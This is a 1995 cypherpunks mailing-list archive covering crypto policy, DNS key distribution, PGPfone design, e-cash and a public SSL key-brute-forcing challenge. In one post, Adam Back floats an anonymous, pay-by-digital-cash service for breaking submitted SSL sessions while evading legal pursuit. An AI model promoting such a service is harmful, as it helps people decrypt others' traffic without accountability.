course, but does anyone know if there is a planned release for a Linux
version, preferably with SoundBlaster support? I mention Soundblaster
support because, even though it's old, it seems to be the standard, at least
indirectly. The GUS has a Soundblaster emulation mode, for instance, if I'm
not mistaken.

Of course I suppose the real reason I'm asking is because I run Linux and
have a Soundblaster. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David L. Garrard" <dgarrard@sola.com.au>
Date: Thu, 10 Aug 95 20:16:33 PDT
To: "remailer@bi-node.zerberus.de>
Subject: No Subject
Message-ID: <01BA67E7.5D664640@herbiehacker>
MIME-Version: 1.0
Content-Type: text/plain




----------
From: 	Ford Prefect[SMTP:remailer@bi-node.zerberus.de]
Sent: 	Friday, 11 August 1995 2:31
To: 	cypherpunks@toad.com

I think we ought to just throw TIM MAY out of the list. 
let's EXCOMMUNICATE HIM. its becoming increasingly clear
that he is the source of all our problems. I mean, isn't
it obvious that our progress has stalled? who has written
any code within the last 3 days? if we got rid of him,
it would be EVOLUTION IN ACTION. 

More drivel deleted.

     Personal attacks in this mailing list is highly inappropriate but doing through a Remailer is downright pathetic.

Dr David L. Garrard










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Fri, 11 Aug 95 03:56:17 PDT
To: cypherpunks@toad.com
Subject: Re: Australia, EU crypto ill news, crypto wars
In-Reply-To: <8500.9508110844@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.HPP.3.91.950811113017.27133A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



Adam wrote:

> Ross Anderson <rja14@cl.cam.ac.uk> writes:
> > ... While at the conference, I found out that a classified meeting
> > took place this March in Germany between the signals intelligence
> > agencies of the developed countries, plus Australia and South Africa,
> > at which the assembled spooks agreed to press their governments to
> > bring in escrow and/or weak crypto.
............
> a) Lobbying - hopeless IMO, they aren't interested in listening, the
>    politicos are just too easy to manipulate and the "masses" aren't
>    clueful enough of what crypto means to understand the implications,
>    or even notice.

The "masses" are not that clueless (remember the 80% against Clipper
in a US poll a year ago). The problem 'here' in the EU is the smartly
construed distance between commons and rulers. We vote for members
of a debate club (who are very generously paid out of tax money)
lacking any power whatsoever. The EU decision on crypto-policy will
emerge from closed chambers of the Commission, and in every member
country the local politicians will announce that 'it has been decided
by EU and there is nothing we can do about it, even if we would like
to'. But this doesn't mean that national freedom-of-(crypto)speech
campaigns will be useless. Civil disobedience, still very common
amongst European citizens faced with ridiculous EU regulations, will
be more likely to thrive if the legitimacy of crypto regulations is
publically questioned in a continuous mode.

A significant difference between (for example) Sweden and USA
is the punishment scales. Suppose Sweden had an ITAR (which
it hasn't). Almost everyone would laughingly export PGP and Wei's
library anyway, because the remote possibility of prosecution (assuming
similarities with the current situation in the US) would hardly
feel like a threat. A conviction would result in a few 100$ fine,
maximum. In the US, where the even so remote possibility of conviction
just possibly might bring about 5 years as Buba's girlfriend, well,
that's a very different story.

An *enforced* ban on crypto in Scandinavia is remote enough that
I'm confident 'SuperStego for Windows' will be out in ver 7.3b by then.

Mats
Gynecologist & Crypto-Groupie 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Fri, 11 Aug 95 03:57:29 PDT
To: cypherpunks@toad.com
Subject: Re: IPSEC goes to RFC
Message-ID: <9508111056.AA09426@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> sdw@lig.net (Stephen D. Williams) wrote:
> 
> > I really like the idea of using DNS for (public I assume) keys...



ghio@cmu.edu (Matthew Ghio) wrote:
 
> I don't.
> 
> Public keys in the DNS is a bad idea because it makes it difficult to
> update the database, especially in large organizations.  When a host's
> key is issued or changed then they would have to get the nameserver
> admin to change it for them.  This could become a major problem/
> inconvenience for many, many people.  The host should be able to give
> its own key in response to a query.  That key could, of course, be
> signed by any number of trusted signators to guarentee authenticity.


I also like the idea of DNS-based public key distribution, but
what Matthew said is true. 

What about this:

Let the DNS-Server export the address of a machine which runs the
public-key-database for this domain, similar to the MX record for
the mailserver.

If you need the public key for a person identified by the email
address or for a host identified by hostname or IP address, you
could ask the DNS server where to get the public key.

The database host could run any program suitable to local requirements
and export public keys with a certain protocol...

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 11 Aug 95 12:56:49 PDT
To: Derek Bell <cypherpunks@toad.com>
Subject: Re: EU Data Protection
Message-ID: <ac51018d04021004d19c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:13 PM 8/11/95, Derek Bell wrote:

>        I think you miss an important point; your opinion is subjective, but
>data can relate to objective facts (e.g. credit records). Would you take the
>same stance if a credit bureau claimed that you couldn't pay back half the
>loans you took out?

Any entity which purports to hold or provide "true" information but which
hold flaky or incorrect information will suffer.

This is true of credit agencies, advice columns, restaurant reviews, movie
ratings, book reviewers, doctor rating agencies, and so on.

I won't get into all of the aspects of reputations, but this is what we're
talking about. And I'll concede that not all of these examples are equally
important, or use the same objective quality of data. A credit rating
agency is no doubt more important than a movie review agency--though
arguably the damaging effects of Siskel and Ebert trashing "Waterworld" can
be many orders of magnitude more than TRW Credit having an incorrect bad
debt recorded.

The point is that we do not have government to maintain the accuracy of
movie reviews, of lawyer ratings, and so forth.

Even if one accepts the "Fair Credit Reporting Act" (a U.S. law which I
think is unconstitutional, as it tells me I cannot report certain kinds of
facts), the European-style data privacy laws are a further step in a wrong
direction.

Think about it: the name "data privacy" sounds good, at first blush, but
what it really means is that my records are not private, that my records
are inspectable by government agents to see if I have stored any illegal
facts or correlations.

>        What worries me about the *lack* of some form of data protection
>legislation is that is allows someone to build up a database of information
>which is a mishmash of truth, misunderstandings and lies. How would you feel if
>"Concerned Citizens against Cryptography" compiled a list of all members
>of this list, branding them as `dangerous, possibily criminal subversives'?

Things like this happen all the time. This is just an opinion they happen
to have. Would you make it a crime for "Concerned Citizens against
Cryptography" to do a "who cypherpunks" of this list and to think we are
"dangerous, possibly criminal subversives"?

In the U.S. such judgements are made all the time. Doesn't make the
judgements right, but rightness is not the basis of the freedom to hold and
express these beliefs.

>What if that opinion was spread to other databases? How about the police
>investigating you because of this kind of database?

"Spreading" the opinion to other databases is no big deal.

The police investigating is a separate issue. Many of us think the police
should be very careful about investigating for beliefs and opinions, but,
in fact, it happens all the time. (It's happened to me, for example.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Fri, 11 Aug 95 13:30:04 PDT
To: "K. M. Ellis" <kelli@zeus.towson.edu>
Subject: Re: your mail
In-Reply-To: <Pine.ULT.3.91.950811142840.22062B-100000@zeus.towson.edu>
Message-ID: <Pine.HPP.3.91.950811133325.27559A-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 11 Aug 1995, K. M. Ellis wrote:

> SHUT UP.
> 

KEEP THIS CRAP IN *PRIVATE* MAIL




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 11 Aug 95 13:47:31 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Purple Boxes
In-Reply-To: <v02120d06ac515d75289e@[199.2.22.120]>
Message-ID: <199508112044.NAA12959@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



D.B.:
>Generally, you are right in suggesting that anything that
>requires people to crawl behind their computers, attach
>new cables, purchase and debug a sound card under Windows,
>and generally engage in techno-weenie hardware manipulations
>will have less appeal than something plug and play.

hey, how about this: remember all the plans for "blue boxes"
etc. that got circulated all over the place during the 70's?
I propose creating the schematics for a "Purple box". the
box would have, dangling, those little rubber cups that can fit over
phone receivers, like on the modems.

it would be called the "purple box" because I have not heard
of any other devices called "purple boxes" (i.e. this string
in the "colorful" hacker namespace does not seem to be used up yet)
and also the famous WWII compromised japanese diplomatic codes 
were called Purple.

the way it would work is that both the caller and callee would
have to agree to use the purple box. they would say "purple"
over the phone after they called up and then both hook up their
little gizmos.

the neat thing about this is that if it catches on, people
would end up buying and selling them and improving them.

actually, as I recall a long time ago someone proposed on this
list doing something very similar except using the devices
as a kind of "kids toy" that would introduce children to
encryption. it would allow them to talk through the device
like a bullhorn, and the receiver would hear gobbledygook
unless they had a decoder next to their ear. now I am
serious, this could be a *really* fun toy for kids. you know
how they love to keep secrets and play around with the idea
of communicating among their friends amidst their enemies.
someone who has an entrepreneurial nose, I bet you could
create a *hot*fad* out of this, and sell perhaps a fraction
as fast as Pogs!!! (you'd be a zillionaire at even 1% the
penetration!!!)

one of the problems is that serious crypto chips are pretty
expensive. but an analog scrambler would actually be a decent
start on all this, and I bet it could be built pretty cheaply.

I volunteer to find a place to *archive* (webify) any of the plans that
people write up and successfully test, including GIFs or whatever.



~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 11 Aug 95 10:50:51 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <v02120d00ac513fd2f9bc@[192.0.2.1]>
Message-ID: <199508111750.NAA25622@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 9:36 8/11/95, Ray Cromwell wrote:
> 
> >  My question is, how portable is it, and does it work over TCP/IP rather
> >than just modem connections (I suggested this about a year ago)? My ideal
> >implementation would function on the following architectures:
> 
> I can't comment on the features of PGPFone. However, know that Internet
> telephony (as all "real time" services) work overe UDP only, not TCP.

  If you reread my message, you'll see I mentioned UDP. I just refer
to IP protocols in general as "TCP/IP", implicit is that UDP and ICMP
are atleast included. The mention of "Winsock" should give you the context.

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Fri, 11 Aug 95 12:10:57 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <ac50c91b000210048e9d@[205.199.118.202]>
Message-ID: <199508111857.AA02958@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> But why the developers actually picked the Mac to do first is something
> they can talk about.

I worked on the Mac version of Nautilus for a very short while.
Nautilus was to provide a core of interoperable code for doing
voice-as-modem-stream on SunOS, DOS/Win, and Mac platforms. The
developer agreement that all developers had to execute specifically
said "I promise not to add any crypto."

That might sound odd-- but the crypto was to be added later, under the
direct or indirect supervision of PRZ. I ran out of time before the
code reached that point.

I don't know what percentage, if any, of the Nautilus code is
incorporated in PGPfone. Based on Will Price's CryptDisk work, I look
forward to learning from the PGPfone source code.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Do you support free speech? Even when
perobich@ingr.com            | you don't like what's being said?
		 Be a cryptography user. Ask me how.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMCuUFafb4pLe9tolAQF/vAQArDUGcD7SDpV1Zo6+neIl21SYQE34cqIx
Kpqs0NV67NUTg/U/EXxalFUs1lioCvGyEbwPRxTaEi3Idfbm5A8BOVDyFJIThtLx
3Nzf7OBpYqbztzht0+E8PGOZnx0dcN2+O1jeqm86GuNp5mJ6JmQZY2ey7aqTIDfr
gAZgUcIFM4k=
=JPdu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 11 Aug 95 11:17:28 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <ac50c91b000210048e9d@[205.199.118.202]>
Message-ID: <199508111816.OAA05222@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 1:36 PM 8/11/95, Ray Cromwell wrote:
> 
> >  My question is, how portable is it, and does it work over TCP/IP rather
> >than just modem connections (I suggested this about a year ago)? My ideal
> >implementation would function on the following architectures:
> >
> >Unix: can be used through either /dev/tty?? or Socket (probably want
> >to use UDP). Works on Solaris, IRIX, AIX, NetBSD/FreeBSD/BSDI and Linux.
> >(audio devices are all proprietary)
> >
> >
> >Windows: uses Window's sound card device drivers, works via either
> >comport or WinSock
> >
> >Mac: uses Mac sound drivers, uses Mac modem port or MacTCP
> 
> From the "MacWeek" article, it initially runs on the Macintosh, using the
> sound capabilities built into (nearly) all Macs. Direct modem connections,
> with Internet versions to follow. (Windows to follow, too.)

  I just hope they isolated the operating system dependent code into
seperate modules so that "PlaySoundChunk(Chunk)" is used rather than 
"MacDeviceDriverCall(MacSpecificDeviceStruct, MacSpecificFormat)"
The application layer should be abstracted above the transmission
layer above the link-layer. At the application layer, communications
should be sent through the transmisson layer, e.g. 
"GetNextPGPFonePacket(Protocol, Packet)". The Protocol here would 
be TCPIPDriver or ModemDriver.  

  Therefore, all one would need to do to port it to different platforms
is code up a TCPIPDriver (for Unix == Berkeley Sockets, for 
Windows = Winsock, for Mac = MacTCP), code up a modem driver
(Unix = tty's + ioctl, Mac = Communications Manager, Windows = TAPI),
and finally port the SoundPlay and SoundRecord functions to the platform
dependent way of playing sounds and recording them.

  If you are forced to abstract above "modems", your algorithms will
be designed to work over more general transmission schemes. I fear
that coding for modems first will lead to an overall application tuned for
modems, but poorly designed for asynchronous networks. The tunning should
be done in the driver, not the application/algorithm level. 
(for example, modems don't experience much "packet churn and loss",
and they usually have a dependable bandwidth. Even if they retrain
randomly from 28.8 to 14.4, they can still be counted on to atleast have
9600 bps throughput more consistently deliverable than say a slip/ppp line 
would)


  Far too often on Macs and PC's I see code "welded" to specific hardware
dependencies. I only hope that PGPFone is more like PGP2.0 and less like
PGP1.0 (and less like HotJava, which is also a bitch to port), because
for general acceptable, I don't think it will succeed until it
atleast runs and interoperates on Mac, Windows, and Linux.


> The Mac may be a strange platform to develop on, to many of you, but it has
> some advantages. The sound tools are relatively standardized and are even
> built into the OS. Developers can thus count on what users will have.

   I don't think there is a problem with developing on the Mac. Atleast
the Mac has a real O/S. If it had been done for DOS first, it might have
been poking SoundBlaster registers with arcade magic constants in the
program. However, the application should be isolated away from its
I/O mechanisms so that all I/O is done through a module which
"maps" I/O requests to the local operating system mechanism, rather
than depending on them directly.

Sorry about the rant. (I haven't seen PGP phone's code, but I am
just remembering RealAudio/InternetPhone/VidPhone and a whole host
of other internet utilities that are either available only for windows,
only for Mac, or only for unix. Netscape seems to have done things
right.)

-Ray
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 12 Aug 95 02:35:47 PDT
To: cypherpunks@toad.com
Subject: Re:  "S1" encryption system
Message-ID: <199508112127.OAA06516@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Carl Ellison <cme@TIS.COM>
> Has it already been observed that the key scheduling repeats keys every
> 5 rounds?

There have been a couple of good messages on sci.crypt, one by Colin
Plumb and one by Thomas Jakobsen.  The latter mentioned something similar
re key scheduling.  I hadn't noticed it.  Chalk up another apparent
weakness.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Fri, 11 Aug 95 11:29:30 PDT
To: Ford Prefect <remailer@bi-node.zerberus.de>
Subject: Re: your mail
In-Reply-To: <m0sgkM8-0002AfC@bi-node.zerberus.de>
Message-ID: <Pine.ULT.3.91.950811142840.22062B-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


SHUT UP.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Fri, 11 Aug 95 10:55:30 PDT
To: perry@piermont.com
Subject: Re: IPSEC goes to RFC
In-Reply-To: <199508111327.JAA01106@panix4.panix.com>
Message-ID: <m0sgyqo-0009ywC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Nesta Stubbs writes:
> > There are some other problems too I believe.  I have worked for a decent 
> > sized network who did all user authentication at the terminal servers for 
> > dial-in accounts thru DNS.  This wasn't too bad for just passws and 
> > stuff, but wouldn't this cause some bloat in the nameservers database?  
> 
> HESIOD is an excellent demonstration that it works just fine.
> 
> > As well as cause problems security wise when it comes to updates.  Would 
> > these automatically not be cached in any form by the site making the 
> > request?  This also causes a problem for smaller time people who perhaps 
> > have a PPP/SLIP connection 24/7 but have nameserve done by their prvider, 
> > and I for sure don't want my provider to be in control of those keys. 
> 
> Why not? After all, they are signed. You can have them held by your
> worst enemy and it should be just fine. Thats the idea of public key
> signatures.

Not only that but it's common now for DNS servers to give short TTL
for the answers (multiple A recs for load balancing), no big deal
to have pseudo-subdomains that are pointed at a different server
(Even over slip/ppp) than normal name service.

I believe the root servers answers for intermediate nodes are cached
normally, so key.george.bub.com doesn't cause a root hit after
bub.com has been resolved.

Quite a few domains do run their own name servers, and it's not too tough
to create auto-update scripts, etc.

There's no reason that DNS has to be the only mechanism.  Default
to one method then fallback to others, like direct IP port connection
for query.

> .pm
> 

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rich Helton" <rich_helton@msmgate.mrg.uswest.com>
Date: Fri, 11 Aug 95 13:38:56 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <n1403970617.32050@msmgate>
MIME-Version: 1.0
Content-Type: text/plain


help <rich_helton@msmgate.mrg.uswest.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 11 Aug 95 11:42:41 PDT
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <199508111759.KAA05515@netcom8.netcom.com>
Message-ID: <199508111842.OAA12222@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> >I can't violate my NDA, but PGPFone will be a *major* revolution for
> >communication security. I would not be surprised to see several hundred
> >thousands of users. PGP will plale in comparison.
> 
> I sincerely doubt this. if someone could find a way of doing 
> voice encryption through simple idiotproof hardware adapters
> (I am thinking of cups that you could attach to any standard phone)
> the voice encryption will not be widely used, I think.
> there are very many PGP users right now, say at least in the
> tens of thousands if not hundreds of thousands. the 
> requirements for live voice encryption are pretty significant:
> a fast computer and fast modem. this alone is only a subset
> of those people using PGP right now. also, I doubt there are
> going to be few people who use PGP phone but not PGP software.

  I don't think CPUs and modems are an issue. When I bought my 486/DX2
more than a year ago, it was a near top of the line machine (a P66 was the 
only thing better and it was a lot more expensive). Now, I can look
in computer shopper and see that not only is my machine not near the
top of the line, it's not even "Entry Level". Pentium 75/90 systems are
going for 1/3 the price I bought my computer for, and those systems have
PCI buses (vs my VESA local bus), larger HDs, EDO RAM, faster video
cards, etc. Assuming a baseline of a 486DX/33 or faster (like a DX4)
is not unreasonable. Secondly, 14.4K modems are a dime a dozen. You
can get them as low as $50 (with RPI) or $70-80 for full functionality.
28.8K modems can be bought for $150. 

  The problem with PGPFone as I see it, is that it's an application and not
a application to a protocol. To get voice encryption in large scale
use will require several things IMHO

1) performance is reasonable
2) user interface is very easy to use, as easy as using a walkie talkie
     with a key
3) software is very easy to setup up (no knowledge of hayes commands required,
no editing of slip configuration, etc)


Finally, even that is not going to drive the system into a defacto
ubiquitous standard unless

4) a complete, easy to read specification of the protocol used is
   published (perhaps as an RFC)
5) third party applications that use the protocol evolve. 

#5 is needed because competition between applications writers will
improve the human interface of the software beyond what the PGP
authors can design. (who are more likely algorithm specialists, 
not human interface people)

6) network independent
   this will be a benefit to people who want to make long distance calls
over data networks. it could also be used by companies for secure 
teleconferencing.


I would like to see a secure voice communication protocol that is divorced
from the particular details of the algorithms used (although a 
base level of some voice compression technique + DES + RSA will have to
be used) That way, new and better algorithms can be dropped in depending
on the network used (modem, ipx, tcp/udp, etc) and the bandwidth required
(CELP vocoder, MPEG-audio, lossless encoding, progressive PCM, etc)


-Ray

  

 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Fri, 11 Aug 95 15:17:44 PDT
To: rjc@clark.net
Subject: PRZ encrypted voice software release imminent
In-Reply-To: <199508111816.OAA05222@clark.net>
Message-ID: <199508112143.OAA02837@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain



>   If you are forced to abstract above "modems", your algorithms will
>   be designed to work over more general transmission schemes. I fear
>   that coding for modems first will lead to an overall application tuned for
>   modems, but poorly designed for asynchronous networks. The tunning should
>   be done in the driver, not the application/algorithm level. 
>   (for example, modems don't experience much "packet churn and loss",
>   and they usually have a dependable bandwidth. Even if they retrain
>   randomly from 28.8 to 14.4, they can still be counted on to atleast have
>   9600 bps throughput more consistently deliverable than say a slip/ppp line 
>   would)

asynchronous networks are a completely different beast than your basic
point-to-point phone call.  Over.

If you expect people to use a secure voice communication device,
they've got to like it.  Over.

I don't know anybody who prefers more latency.  Over.

I think that it makes great sense to optimize for a point-to-point
connection.  I also believe that it should be an un-error corrected
channel (no V.42 or V.42bis) since many speech coders can tolerate
the errors.

Knowing the channel characteristics also allows you to tailor your
crypto usage.  If you know you've got a raw synchronous channel, and
Pr(bit insert or bit delete) << Pr(bit error) than you can avoid a lot
of overhead.  This does matter where bandwidth is tight.  Say,
sticking a 13,000 bit/s coder down a 14,400 bit/s pipe.  With GSM's
260 bit frame every 20ms, it leaves 28 bits per frame for all
overhead.  This includes any forward error correction, sync
maintenance, crypto IV's etc.  You can't tune this in the driver.

None of this says that you shouldn't also optimize for the packetized
case too.  I think that you can negotiate the right behavior at start
up time based on detected channel characteristics.  I think that the
biggest impact is in the framing overhead, or lack of it.

You are always trading off bandwidth, speech quality and MIPs.

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Thomas <jthomas@access.digex.net>
Date: Fri, 11 Aug 95 11:46:40 PDT
To: cypherpunks@toad.com
Subject: Bay Area Meeting This Weekend?
Message-ID: <Pine.SUN.3.91.950811144404.27170B-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm just about to fly out to San Francisco, and I realized that coming up 
is the second Saturday of the month, the traditional meeting time for the 
Bay Area Cypherpunks.  I haven't seen any meeting announcements, so 
please e-mail me if there 's one scheduled (and if you can give a ride 
from S.F. if so!).  I've just temporarily unsubscribed (I'll catch up on 
the archives when I return), so please cc me if you announce the meeting  
to the list.

Thanks,

Joe Thomas




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatjana vonBernhardi <tatjana@polaris.mindport.net>
Date: Fri, 11 Aug 95 11:52:34 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: Bank Fees and E-Cash
In-Reply-To: <Pine.SUN.3.91.950809190129.17834A-100000@access5.digex.net>
Message-ID: <Pine.SUN.3.91.950811144359.194A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 9 Aug 1995, Black Unicorn wrote:

> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> - - - Bank Fees and the E-cash Niche.
> 
> Banks have gorged themselves on rocketing fees for the last five 
> years.  The result is that typical bank customer currently pays 
> 150% of the amount of interest collected on accounts in a given 
> year in the form of fees.  My prediction, and my hope, is that e-
> cash will cut through the pretense upon which the rationalization 
> of many of these fees is based, and even market itself on this 
> point- Lower Fees.
> 

you have surpassed yourself in assumption here A,

your hope that e-cash will some how reduce bank fees is a long stretch.
banks like their fees and the massive profits they pull too much to cut 
this part out.  they will likely charge more for the great gift of e-cash 
as if it were some special feature.
> 
> I cannot believe that e-cash won't be able to solve some of these 
> problems, and I hope it will limit its own fees to usage.  To me 
> this is a classic argument for small house e-cash shops.  Citibank 
> and Mastercard are going to fight for their fees.

how will small shops hope to run with consumer titians like citibank and 
such?  all they need to is announce something nifty like the "electric 
purse" and call it e-cash and the market is closed.
> 
> 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
> E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
> *New Key Information*    -    Finger for key revocation and latest key update.
> 


XXX's & OOO's anyhow  =)

     +tat

--
www.mindport.net/~tatjana 
"Life... is a state of mind."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Hamilton <martin@mrrl.lut.ac.uk>
Date: Fri, 11 Aug 95 07:07:41 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <199508111336.JAA05910@clark.net>
Message-ID: <199508111406.PAA10668@gizmo.lut.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:

| Unix: can be used through either /dev/tty?? or Socket (probably want
| to use UDP). Works on Solaris, IRIX, AIX, NetBSD/FreeBSD/BSDI and Linux.
| (audio devices are all proprietary)

AudioFile could be one way around the proprietary audio device 
problem - have a look for "AF" on archie

Martin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 11 Aug 95 07:14:33 PDT
To: kinney@bogart.Colorado.EDU ("W. Kinney")
Subject: Re: SSL bruting progress
Message-ID: <10188.9508111413@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Will Kinney <kinney@bogart.colorado.edu> writes on cpunks:
> > We've not managed to isolate the cause of it, as (two people) have
> > nearly swept the entire keyspace (heh they had a bit of spare compute)
> > and no key has been forthcoming so far.
> 
> Um, if you're going to sweep the whole space yourself before you release
> the code, what's the point in a public sweep? 

Surety.

Nothing as disappointing as throwing all your spare compute joyfully
into such a fun cpunk project, and then finding no key comes from it.
Witness the RC4 bruting, which lots of folks thought fun, but
unfortunately (well it should have been expected, and it was in part,
as there were no specs, all we knew was microsoft said it was RC4 in
some way, nothing more) no key.

Also the private sweeping wasn't planned, just Eric Young said, hey
I've started at 8000 I'll sweep up from there till you're ready.
(Eric already had his own SSL bruting code).  Then David Byers asked
for a copy of Andrew Roos brute ssl to port to the maspar he has
access to, and next thing he said, hey I got it working at 1.5M
keys/sec and left it running, it'll reach Eric's start in a couple of
days.  As it turned out that they haven't found anything yet, their
keysweeping is going to be very useful to figure out what's wrong.
It's much harder to track down problems, accidentally unswept keyspace
etc, when there are 100s of sweepers.

Anyway, when we're as sure as we can be that it will work, we'll
probably try to persuade Hal for another sample session.  So that it
will be a challenge, that we don't know the answer for.

Perhaps it would be fun to have a regular key crunching ring set up
once it's all verified, and proven to work.  Part of the problem with
this is the legal implications, you probably can't expect to get away
with breaking SSL sessions no questions asked - give us a SSL session
key startup and we'll brute it - at least not openly.  A central key
distribution point kind of blows this, as it gives legal beagles
somebody to go after.

The other key distribution architecture, is an unknown machine out
there somewhere in cyberspace :-) Ie a blacknet style address and 2048
bit public key:

	brute@cyberspace.nil

with a charge levied in anon digital cash.  A sweepstake perhaps, he
who hits the key first gets the anon digital cash remailed to him (tax
free of course).

An architecture resilient to interference on both legal and
ill-meaning key-sweepers sides (the possibility exists for someone to
reserve keyspace and not sweep it) is to just search randomly.  Very
simple architecture, but somewhat wasteful of resources, least likely
to be detected, as there is less communication.  One drop off of 'the
session' to cpunks, and another of the result by the euphoric lucky
person who happened to start in the right place.

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@wwa.com>
Date: Fri, 11 Aug 95 13:17:57 PDT
To: cypherpunks@toad.com
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <199508111759.KAA05515@netcom8.netcom.com>
Message-ID: <Pine.LNX.3.91.950811151053.2010A-100000@ts07.neiu.bgu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 11 Aug 1995, Vladimir Z. Nuri wrote:

> the real holy grail for voice communication encryption is
> when this stuff starts to get integrated into the real 
> phone system, or people start making hardware that is
